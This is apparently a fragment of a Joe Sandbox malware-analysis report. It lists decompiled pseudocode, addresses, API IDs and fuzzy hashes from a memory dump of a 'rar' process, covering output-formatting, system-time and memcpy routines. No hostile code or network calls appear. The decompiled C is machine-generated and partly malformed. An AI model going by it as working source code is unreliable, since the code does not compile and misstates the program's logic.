                                                                                                            0x7ff650b46e44
                                                                                                            0x7ff650b46e47
                                                                                                            0x7ff650b46e56
                                                                                                            0x7ff650b46e5f
                                                                                                            0x7ff650b46e7d
                                                                                                            0x7ff650b46e8d
                                                                                                            0x7ff650b46e91
                                                                                                            0x7ff650b46e9b
                                                                                                            0x7ff650b46ea4
                                                                                                            0x7ff650b46ead
                                                                                                            0x7ff650b46eb8
                                                                                                            0x7ff650b46ebb
                                                                                                            0x7ff650b46ec3
                                                                                                            0x7ff650b46eca
                                                                                                            0x7ff650b46ed1
                                                                                                            0x7ff650b46ef1

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: swprintf
                                                                                                            • String ID: -rr%u$1000
                                                                                                            • API String ID: 233258989-239198766
                                                                                                            • Opcode ID: 5f4a721220171df0209143a33e0980d188700a1583aa16a09963649954281e84
                                                                                                            • Instruction ID: 44683ea2a239753f150ec1bc6e0dc45e5277d9084669325601b9afc91ea055e1
                                                                                                            • Opcode Fuzzy Hash: 5f4a721220171df0209143a33e0980d188700a1583aa16a09963649954281e84
                                                                                                            • Instruction Fuzzy Hash: 474120B2B04746A7EB18CB2AE49076836A1FB49B84F848435DB4E97F54DF3DE521CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B14AF0 Relevance: 5.4, Strings: 4, Instructions: 363COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E00007FF67FF650B14AF0(void* __ecx, void* __rax, long long __rbx, signed long long* __rcx, void* __rdx, void* __r8, void* __r10, void* __r11) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r13;
				void* __r15;
				void* _t112;
				void* _t118;
				void* _t135;
				void* _t144;
				void* _t145;
				void* _t147;
				void* _t153;
				void* _t158;
				intOrPtr _t162;
				signed long long _t222;
				signed long long _t223;
				long long* _t224;
				signed long long _t227;
				intOrPtr* _t229;
				signed long long _t230;
				long long _t238;
				long long _t242;
				signed long long _t243;
				signed long long _t246;
				signed long long _t247;
				void* _t248;
				void* _t255;
				long long* _t261;
				void* _t330;
				intOrPtr* _t333;
				intOrPtr* _t335;
				intOrPtr* _t339;
				void* _t342;
				void* _t343;
				void* _t345;
				void* _t348;
				signed long long _t349;
				void* _t359;
				void* _t365;
				void* _t366;
				void* _t368;
				long long* _t369;
				intOrPtr _t372;
				void* _t375;
				signed long long* _t376;
				void* _t378;
				long long* _t379;
				void* _t380;
				intOrPtr* _t384;

				_t364 = __r11;
				_t363 = __r10;
				_t351 = __r8;
				_t158 = __ecx;
				 *((long long*)(_t348 + 0x18)) = __rbx;
				_t346 = _t348 - 0xfb0;
				_t112 = E00007FF67FF650B69CB0(0x10b0, __rax, __r10, __r11);
				_t349 = _t348 - __rax;
				_t222 =  *0x50b978f0; // 0x27db226282f1
				_t223 = _t222 ^ _t349;
				 *(_t348 - 0xfb0 + 0xfa8) = _t223;
				_t366 = __rdx;
				_t376 = __rcx;
				if ( *((intOrPtr*)(__rdx + 0x28)) - __rbx <= 0) goto 0x50b15061;
				E00007FF67FF650B166E0(_t112, __rdx, __rbx);
				E00007FF67FF650B151EC(__rcx, _t223);
				_t5 = _t342 + 1; // 0x1
				_t255 =  ==  ? _t342 : _t5;
				_t343 = _t255;
				_t238 = __rbx + 1;
				if (_t238 -  *((intOrPtr*)(__rdx + 0x28)) < 0) goto 0x50b14b3a;
				if (_t255 == 0) goto 0x50b15061;
				r8d = 0;
				E00007FF67FF650B1508C(_t238, __rcx, _t223, _t343, __r8, _t378);
				_t224 =  <  ? 0xffffffff : _t223;
				_t118 = E00007FF67FF650B69B9C(_t223, _t359);
				_t369 = _t224;
				 *((long long*)(_t349 + 0x38)) = _t224;
				if ( *((intOrPtr*)(_t366 + 0x28)) - _t238 <= 0) goto 0x50b14bf7;
				E00007FF67FF650B166E0(_t118, _t366, _t238);
				_t379 = _t224;
				if (E00007FF67FF650B151EC(_t376, _t224) == 0) goto 0x50b14bed;
				_t261 = _t224;
				 *_t261 = _t238;
				 *((long long*)(_t261 + 0x10)) =  *((intOrPtr*)(_t379 + 8));
				asm("xorps xmm0, xmm0");
				asm("movups [ecx+0x18], xmm0");
				asm("movups [ecx+0x28], xmm0");
				 *(_t261 + 0x38) =  *(_t261 + 0x38) & 0x00000000;
				if (_t238 + 1 -  *((intOrPtr*)(_t366 + 0x28)) < 0) goto 0x50b14bae;
				 *0x50b982d8 =  *0x50b982d8 & 0x00000000;
				r8d = 0x40;
				E00007FF67FF650B6EEC0(_t238 + 1, _t369, _t343, _t224 + 0x40, _t343, _t351, 0x7ff650b13bc0, _t369, _t379);
				r15d = 0;
				_t20 = _t343 - 1; // 0x0
				if (_t343 == 0) goto 0x50b14cd5;
				_t21 = _t369 + 0x50; // 0x50
				_t333 = _t21;
				if (_t379 - _t20 >= 0) goto 0x50b14c44;
				if ( *((char*)(_t333 - 0x17)) != 0) goto 0x50b14c44;
				if ( *((char*)(_t333 + 0x29)) != 0) goto 0x50b14c44;
				if ( *((intOrPtr*)(_t333 - 0x40)) ==  *_t333) goto 0x50b14c5f;
				if (_t379 == 0) goto 0x50b14cc5;
				if ( *((char*)(_t333 - 0x17)) != 0) goto 0x50b14cc5;
				if ( *((char*)(_t333 - 0x57)) != 0) goto 0x50b14cc5;
				_t227 =  *((intOrPtr*)(_t333 - 0x80));
				if ( *((intOrPtr*)(_t333 - 0x40)) != _t227) goto 0x50b14cc5;
				E00007FF67FF650B5B008();
				E00007FF67FF650B166E0(E00007FF67FF650B1508C(_t20, _t376, _t379, _t343, _t343 + _t343, _t375), _t366,  *((intOrPtr*)(_t333 - 0x50)));
				E00007FF67FF650B31C28(_t349 + 0x40);
				r8d = 0;
				if (E00007FF67FF650B321C0(_t227,  *_t227, _t349 + 0x40,  *_t227) == 0) goto 0x50b14cb3;
				 *((intOrPtr*)(_t333 - 0x48)) = E00007FF67FF650B13260(_t158, _t227,  *_t227, _t349 + 0x40, _t343, _t348 - 0xfb0);
				goto 0x50b14cb7;
				 *((char*)(_t333 - 0x17)) = 1;
				E00007FF67FF650B31C70(_t349 + 0x40);
				_t37 = _t343 - 1; // 0x0
				_t242 = _t37;
				_t380 = _t379 + 1;
				if (_t380 - _t343 < 0) goto 0x50b14c2a;
				 *0x50b982d8 = 1;
				r8d = 0x40;
				E00007FF67FF650B6EEC0(_t242, _t369, _t343, _t333 + 0x40, _t343, _t343 + _t343, 0x7ff650b13bc0, _t369, _t380);
				E00007FF67FF650B69B58(_t227, _t369);
				 *(_t349 + 0x30) = _t227;
				if (_t227 == 0) goto 0x50b14d19;
				E00007FF67FF650B5B0B8(8, _t227, _t242, _t227, 0x7ff650b13bc0);
				 *_t376 = _t227;
				 *(_t349 + 0x28) =  *(_t349 + 0x28) & 0x00000000;
				 *(_t349 + 0x30) =  *(_t349 + 0x30) & 0x00000000;
				 *((intOrPtr*)(_t349 + 0x20)) = 0;
				r15d = 0;
				if (_t343 == 0) goto 0x50b14e68;
				_t45 = _t369 + 0x50; // 0x50
				_t335 = _t45;
				if (_t380 - _t242 >= 0) goto 0x50b14d65;
				if ( *((char*)(_t335 - 0x17)) != 0) goto 0x50b14d65;
				if ( *((char*)(_t335 + 0x29)) != 0) goto 0x50b14d65;
				if ( *((intOrPtr*)(_t335 - 0x40)) !=  *_t335) goto 0x50b14d65;
				if ( *((intOrPtr*)(_t335 - 0x48)) ==  *((intOrPtr*)(_t335 - 8))) goto 0x50b14d9f;
				if (_t380 == 0) goto 0x50b14e53;
				if ( *((char*)(_t335 - 0x17)) != 0) goto 0x50b14e53;
				if ( *((char*)(_t335 - 0x57)) != 0) goto 0x50b14e53;
				_t229 =  *((intOrPtr*)(_t335 - 0x80));
				if ( *((intOrPtr*)(_t335 - 0x40)) != _t229) goto 0x50b14e53;
				if ( *((intOrPtr*)(_t335 - 0x48)) !=  *((intOrPtr*)(_t335 - 0x88))) goto 0x50b14e53;
				if (0 != 0) goto 0x50b14dc5;
				E00007FF67FF650B166E0( *((intOrPtr*)(_t335 - 0x88)), _t366,  *((intOrPtr*)(_t335 - 0x50)));
				_t315 =  *(_t349 + 0x28) +  *((intOrPtr*)(_t229 + 8));
				 *(_t349 + 0x28) =  *(_t349 + 0x28) +  *((intOrPtr*)(_t229 + 8));
				goto 0x50b14e4f;
				E00007FF67FF650B5B008();
				_t243 =  *(_t349 + 0x30);
				_t135 = E00007FF67FF650B166E0(E00007FF67FF650B1508C(_t243, _t376, _t243 + _t315, _t343, _t315 * 2, _t368), _t366,  *((intOrPtr*)(_t335 - 0x50)));
				 *(_t349 + 0x30) = _t243 +  *((intOrPtr*)(_t229 + 8));
				E00007FF67FF650B166E0(_t135, _t366,  *((intOrPtr*)(_t335 - 0x50)));
				E00007FF67FF650B31C28(_t349 + 0x40);
				r8d = 0;
				if (E00007FF67FF650B321C0(_t229,  *_t229, _t349 + 0x40,  *_t229) == 0) goto 0x50b14e3d;
				_t71 = _t335 - 0x38; // 0x18
				E00007FF67FF650B13180(0, E00007FF67FF650B321C0(_t229,  *_t229, _t349 + 0x40,  *_t229),  *_t229, _t376, _t349 + 0x40, _t71, _t363, _t364);
				 *((char*)(_t335 - 0x18)) = 1;
				goto 0x50b14e41;
				 *((char*)(_t335 - 0x17)) = 1;
				E00007FF67FF650B31C70(_t349 + 0x40);
				_t76 = _t343 - 1; // 0x0
				_t246 = _t76;
				if (_t380 + 1 - _t343 < 0) goto 0x50b14d43;
				_t372 =  *((intOrPtr*)(_t349 + 0x38));
				_t162 =  *((intOrPtr*)(_t349 + 0x20)) + 1;
				 *((intOrPtr*)(_t349 + 0x20)) = _t162;
				if (_t162 - 2 < 0) goto 0x50b14d2e;
				 *0x50b982d8 = 2;
				r8d = 0x40;
				E00007FF67FF650B6EEC0(_t246, _t372, _t343, _t335 + 0x40, _t343, _t71, 0x7ff650b13bc0, _t372, _t380 + 1);
				r8d = 0x64;
				E00007FF67FF650B1508C(_t246, _t376, _t343, _t343, _t71, _t365);
				 *((intOrPtr*)(_t349 + 0x20)) = 0;
				_t82 = _t343 - 1; // 0x0
				_t230 = _t82;
				if (_t230 == 0) goto 0x50b14ffc;
				_t384 = (_t246 << 6) + _t372;
				_t247 = _t246 + 1;
				if (_t247 - _t343 >= 0) goto 0x50b14fef;
				_t339 = (_t247 << 6) + _t372;
				r13d =  *((intOrPtr*)(_t349 + 0x20));
				r9b = 1;
				r8d = 0;
				if (E00007FF67FF650B136AC(_t384, _t339) == 0) goto 0x50b14fe1;
				_t144 = E00007FF67FF650B166E0(_t143, _t366,  *_t384);
				 *(_t349 + 0x30) = _t230;
				_t145 = E00007FF67FF650B166E0(_t144, _t366,  *_t339);
				 *(_t349 + 0x28) = _t230;
				 *((long long*)(_t230 + 0x50)) =  *_t384;
				if ( *((intOrPtr*)(_t376[0xc] + 0x71d0)) - 2 - 1 > 0) goto 0x50b14fb2;
				_t89 = _t339 - 0x40; // -63
				if (_t384 != _t89) goto 0x50b14f77;
				r8d = 0x14;
				E00007FF67FF650B5A17C(_t145, _t247,  *((intOrPtr*)( *(_t349 + 0x30) + 8)), _t346 + 0xf80, _t343, _t230, 0x7ff650b13bc0, _t364, _t330);
				_t147 = E00007FF67FF650B283F0(L"\n\n%12s  %s", _t346 + 0xf80,  *( *(_t349 + 0x30)), 0x7ff650b13bc0, _t342);
				r8d = 0x14;
				E00007FF67FF650B5A17C(_t147, _t247,  *((intOrPtr*)( *(_t349 + 0x28) + 8)), _t346 + 0xf80, _t343,  *( *(_t349 + 0x30)), 0x7ff650b13bc0, _t364, _t345);
				E00007FF67FF650B283F0(L"\n%12s  %s", _t346 + 0xf80,  *( *(_t349 + 0x28)), 0x7ff650b13bc0);
				_t358 =  *(_t349 + 0x28);
				if ( *((intOrPtr*)(_t376[0xc] + 0x71d0)) != 4) goto 0x50b14fce;
				E00007FF67FF650B283F0(L"%s\n",  *( *(_t349 + 0x28)),  *(_t349 + 0x28), 0x7ff650b13bc0);
				_t248 = _t247 + 1;
				r13d = r13d + 1;
				if (_t248 - _t343 < 0) goto 0x50b14ee3;
				 *((intOrPtr*)(_t349 + 0x20)) = r13d;
				_t105 = _t343 - 1; // 0x0
				if (_t248 - _t105 < 0) goto 0x50b14ebe;
				r8d =  *((intOrPtr*)(_t376[0xc] + 0x71d0));
				if (r8d == 4) goto 0x50b1503c;
				_t295 =  ==  ? L"\n\n" : L"   ";
				E00007FF67FF650B283F0( ==  ? L"\n\n" : L"   ",  *( *(_t349 + 0x28)),  *(_t349 + 0x28), 0x7ff650b13bc0);
				E00007FF67FF650B54598(0xea6,  *((intOrPtr*)(_t349 + 0x20)), _t248, _t343, _t346,  *(_t349 + 0x28));
				_t153 = E00007FF67FF650B283F0(L"\n\n",  *( *(_t349 + 0x28)), _t358, 0x7ff650b13bc0);
				0x50b69b94();
				if ( *_t376 == 0) goto 0x50b15061;
				E00007FF67FF650B5B190();
				0x50b69b94();
				return E00007FF67FF650B69D10(_t153, 0xea6,  *(_t346 + 0xfa8) ^ _t349);
			}




















































                                                                                                            0x7ff650b14af0
                                                                                                            0x7ff650b14af0
                                                                                                            0x7ff650b14af0
                                                                                                            0x7ff650b14af0
                                                                                                            0x7ff650b14af0
                                                                                                            0x7ff650b14b00
                                                                                                            0x7ff650b14b0d
                                                                                                            0x7ff650b14b12
                                                                                                            0x7ff650b14b15
                                                                                                            0x7ff650b14b1c
                                                                                                            0x7ff650b14b1f
                                                                                                            0x7ff650b14b26
                                                                                                            0x7ff650b14b29
                                                                                                            0x7ff650b14b34
                                                                                                            0x7ff650b14b40
                                                                                                            0x7ff650b14b4b
                                                                                                            0x7ff650b14b50
                                                                                                            0x7ff650b14b56
                                                                                                            0x7ff650b14b5a
                                                                                                            0x7ff650b14b5d
                                                                                                            0x7ff650b14b65
                                                                                                            0x7ff650b14b6a
                                                                                                            0x7ff650b14b70
                                                                                                            0x7ff650b14b7a
                                                                                                            0x7ff650b14b8e
                                                                                                            0x7ff650b14b95
                                                                                                            0x7ff650b14b9a
                                                                                                            0x7ff650b14b9d
                                                                                                            0x7ff650b14ba9
                                                                                                            0x7ff650b14bb4
                                                                                                            0x7ff650b14bb9
                                                                                                            0x7ff650b14bc9
                                                                                                            0x7ff650b14bcb
                                                                                                            0x7ff650b14bd2
                                                                                                            0x7ff650b14bd9
                                                                                                            0x7ff650b14bdd
                                                                                                            0x7ff650b14be0
                                                                                                            0x7ff650b14be4
                                                                                                            0x7ff650b14be8
                                                                                                            0x7ff650b14bf5
                                                                                                            0x7ff650b14bf7
                                                                                                            0x7ff650b14c05
                                                                                                            0x7ff650b14c11
                                                                                                            0x7ff650b14c16
                                                                                                            0x7ff650b14c19
                                                                                                            0x7ff650b14c20
                                                                                                            0x7ff650b14c26
                                                                                                            0x7ff650b14c26
                                                                                                            0x7ff650b14c2d
                                                                                                            0x7ff650b14c33
                                                                                                            0x7ff650b14c39
                                                                                                            0x7ff650b14c42
                                                                                                            0x7ff650b14c47
                                                                                                            0x7ff650b14c4d
                                                                                                            0x7ff650b14c53
                                                                                                            0x7ff650b14c55
                                                                                                            0x7ff650b14c5d
                                                                                                            0x7ff650b14c5f
                                                                                                            0x7ff650b14c7a
                                                                                                            0x7ff650b14c87
                                                                                                            0x7ff650b14c8d
                                                                                                            0x7ff650b14c9f
                                                                                                            0x7ff650b14cae
                                                                                                            0x7ff650b14cb1
                                                                                                            0x7ff650b14cb3
                                                                                                            0x7ff650b14cbc
                                                                                                            0x7ff650b14cc1
                                                                                                            0x7ff650b14cc1
                                                                                                            0x7ff650b14cc5
                                                                                                            0x7ff650b14ccf
                                                                                                            0x7ff650b14cd5
                                                                                                            0x7ff650b14ce6
                                                                                                            0x7ff650b14cf2
                                                                                                            0x7ff650b14cfc
                                                                                                            0x7ff650b14d01
                                                                                                            0x7ff650b14d09
                                                                                                            0x7ff650b14d13
                                                                                                            0x7ff650b14d19
                                                                                                            0x7ff650b14d1c
                                                                                                            0x7ff650b14d22
                                                                                                            0x7ff650b14d2a
                                                                                                            0x7ff650b14d2e
                                                                                                            0x7ff650b14d34
                                                                                                            0x7ff650b14d3a
                                                                                                            0x7ff650b14d3a
                                                                                                            0x7ff650b14d46
                                                                                                            0x7ff650b14d4c
                                                                                                            0x7ff650b14d52
                                                                                                            0x7ff650b14d5b
                                                                                                            0x7ff650b14d63
                                                                                                            0x7ff650b14d68
                                                                                                            0x7ff650b14d72
                                                                                                            0x7ff650b14d7c
                                                                                                            0x7ff650b14d82
                                                                                                            0x7ff650b14d8a
                                                                                                            0x7ff650b14d99
                                                                                                            0x7ff650b14da1
                                                                                                            0x7ff650b14daa
                                                                                                            0x7ff650b14db4
                                                                                                            0x7ff650b14db8
                                                                                                            0x7ff650b14dc0
                                                                                                            0x7ff650b14dc5
                                                                                                            0x7ff650b14dd2
                                                                                                            0x7ff650b14dea
                                                                                                            0x7ff650b14df3
                                                                                                            0x7ff650b14dff
                                                                                                            0x7ff650b14e0c
                                                                                                            0x7ff650b14e12
                                                                                                            0x7ff650b14e24
                                                                                                            0x7ff650b14e26
                                                                                                            0x7ff650b14e32
                                                                                                            0x7ff650b14e37
                                                                                                            0x7ff650b14e3b
                                                                                                            0x7ff650b14e3d
                                                                                                            0x7ff650b14e46
                                                                                                            0x7ff650b14e4b
                                                                                                            0x7ff650b14e4b
                                                                                                            0x7ff650b14e5d
                                                                                                            0x7ff650b14e63
                                                                                                            0x7ff650b14e68
                                                                                                            0x7ff650b14e6a
                                                                                                            0x7ff650b14e71
                                                                                                            0x7ff650b14e77
                                                                                                            0x7ff650b14e88
                                                                                                            0x7ff650b14e94
                                                                                                            0x7ff650b14e9e
                                                                                                            0x7ff650b14ea4
                                                                                                            0x7ff650b14eab
                                                                                                            0x7ff650b14eb1
                                                                                                            0x7ff650b14eb1
                                                                                                            0x7ff650b14eb8
                                                                                                            0x7ff650b14ec5
                                                                                                            0x7ff650b14ec8
                                                                                                            0x7ff650b14ece
                                                                                                            0x7ff650b14edb
                                                                                                            0x7ff650b14ede
                                                                                                            0x7ff650b14ee3
                                                                                                            0x7ff650b14ee6
                                                                                                            0x7ff650b14ef6
                                                                                                            0x7ff650b14f02
                                                                                                            0x7ff650b14f07
                                                                                                            0x7ff650b14f12
                                                                                                            0x7ff650b14f1a
                                                                                                            0x7ff650b14f22
                                                                                                            0x7ff650b14f36
                                                                                                            0x7ff650b14f38
                                                                                                            0x7ff650b14f3f
                                                                                                            0x7ff650b14f41
                                                                                                            0x7ff650b14f57
                                                                                                            0x7ff650b14f72
                                                                                                            0x7ff650b14f77
                                                                                                            0x7ff650b14f8d
                                                                                                            0x7ff650b14fa8
                                                                                                            0x7ff650b14fad
                                                                                                            0x7ff650b14fbd
                                                                                                            0x7ff650b14fc9
                                                                                                            0x7ff650b14fce
                                                                                                            0x7ff650b14fd5
                                                                                                            0x7ff650b14fdb
                                                                                                            0x7ff650b14fe1
                                                                                                            0x7ff650b14feb
                                                                                                            0x7ff650b14ff2
                                                                                                            0x7ff650b15000
                                                                                                            0x7ff650b1500b
                                                                                                            0x7ff650b1501f
                                                                                                            0x7ff650b15023
                                                                                                            0x7ff650b1502d
                                                                                                            0x7ff650b15037
                                                                                                            0x7ff650b1503f
                                                                                                            0x7ff650b1504a
                                                                                                            0x7ff650b1504f
                                                                                                            0x7ff650b1505c
                                                                                                            0x7ff650b1508a

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create$File$ErrorLast$CriticalEventInitializeSectionSemaphoreSleepTime_invalid_parameter_noinfo
                                                                                                            • String ID: %12s %s$%12s %s$ $%s
                                                                                                            • API String ID: 1302928930-221484280
                                                                                                            • Opcode ID: 24b50b2c5bc3e7e2dff5a5c968d8c0e1523f5db3c0ee0ba6904a0e76f2841935
                                                                                                            • Instruction ID: fe08bfb18e0079582bbd88b6e6071557e14c4eb50cb1b2bff44c89dc750c1695
                                                                                                            • Opcode Fuzzy Hash: 24b50b2c5bc3e7e2dff5a5c968d8c0e1523f5db3c0ee0ba6904a0e76f2841935
                                                                                                            • Instruction Fuzzy Hash: DEE1D062B09643A6EA20DB16D0942BE63A1FB8ABC4F4C4435EE0FA7785DF3ED555C340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5B9D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E00007FF67FF650B5B9D8(signed long long* __rcx) {
				signed int _v16;
				void* _v32;
				signed int _v40;
				int _t7;
				void* _t9;
				signed long long _t11;
				signed long long _t21;

				_t11 =  *0x50b978f0; // 0x27db226282f1
				_v16 = _t11 ^ _t21;
				GetSystemTime(??);
				_t7 = SystemTimeToFileTime(??, ??);
				 *__rcx = _v40 * 0x64;
				return E00007FF67FF650B69D10(_t7, _t9, _v16 ^ _t21);
			}










                                                                                                            0x7ff650b5b9de
                                                                                                            0x7ff650b5b9e8
                                                                                                            0x7ff650b5b9f5
                                                                                                            0x7ff650b5ba05
                                                                                                            0x7ff650b5ba11
                                                                                                            0x7ff650b5ba26

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$System$File
                                                                                                            • String ID: The system cannot find the file specified.
                                                                                                            • API String ID: 2838179519-3806670226
                                                                                                            • Opcode ID: a128c5d93bd5889b86827fa4d4d9b68348501926900bfdaa163f466ec1b57d0e
                                                                                                            • Instruction ID: f1be9047c93153f5e5a3e2d94004025a6934bc56966087e838ffde4028825a5a
                                                                                                            • Opcode Fuzzy Hash: a128c5d93bd5889b86827fa4d4d9b68348501926900bfdaa163f466ec1b57d0e
                                                                                                            • Instruction Fuzzy Hash: C3E03062618A4791EE919B10F8D516A7360FF98794F481131D58F46734DE2CD155CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B7AB60 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODECrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00007FF67FF650B7AB60(intOrPtr* __rcx, long long __rdx, long long _a16) {

				_a16 = __rdx;
				r9d =  *__rcx;
				if (r9d != 0) goto 0x50b7ab88;
				return 0;
			}



                                                                                                            0x7ff650b7ab60
                                                                                                            0x7ff650b7ab6e
                                                                                                            0x7ff650b7ab7a
                                                                                                            0x7ff650b7ab87

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy_s
                                                                                                            • String ID:
                                                                                                            • API String ID: 1502251526-0
                                                                                                            • Opcode ID: 70c0b5c9f173c4f2f19c2ea5832ec085c8a19f6ec01fb735b7a86ca987de8b06
                                                                                                            • Instruction ID: 8a63860da11df041689fa83708cf7ba254912ae2eb4dac6d04128ce4d0659dfd
                                                                                                            • Opcode Fuzzy Hash: 70c0b5c9f173c4f2f19c2ea5832ec085c8a19f6ec01fb735b7a86ca987de8b06
                                                                                                            • Instruction Fuzzy Hash: F3D1A2B2B1868697DB74CF15E18466AB7A1F789784F188134DB4FA7B44DE3DE841CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5AC9C Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
